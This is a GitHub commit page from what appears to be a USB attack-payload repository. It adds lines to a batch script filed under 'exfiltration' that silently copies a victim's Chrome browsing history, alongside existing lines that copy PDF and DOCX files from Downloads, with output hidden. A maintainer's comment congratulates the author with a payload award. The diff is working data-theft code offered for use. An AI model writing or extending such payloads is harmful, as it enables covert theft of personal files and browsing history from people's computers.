Skip to content

Commit

Permalink
Update x.cmd (#536)
Browse files Browse the repository at this point in the history
If google chrome is installed, download the history.
  • Loading branch information
ferraribash authored Jul 14, 2022
1 parent 8185b97 commit cae9421
Showing 1 changed file with 4 additions and 0 deletions.
4 changes: 4 additions & 0 deletions payloads/library/exfiltration/simple-usb-extractor/x.cmd
Original file line number Diff line number Diff line change
Expand Up @@ -33,5 +33,9 @@ xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.pdf %dst% >>nul
xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.docx %dst% >>nul
)

if Exist %USERPROFILE%\AppData\Local\Google\Chrome\ (
xcopy /C /Q /G /Y "%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\History" %dst% >>nul
)

@cls
@exit

2 comments on commit cae9421

@hak5darren
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@ferraribash 🥳 Congratulations
🏆 You have been recognized with a payload award at https://payloads.hak5.org/
🎁 Please accept the reward for your contribution at https://rewards.hak5.org/
🎉 PS: You are now in the running for Payload Hero of the Year! https://hak5.org/awards

@ferraribash
Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks! I really appreciate this.

Please sign in to comment.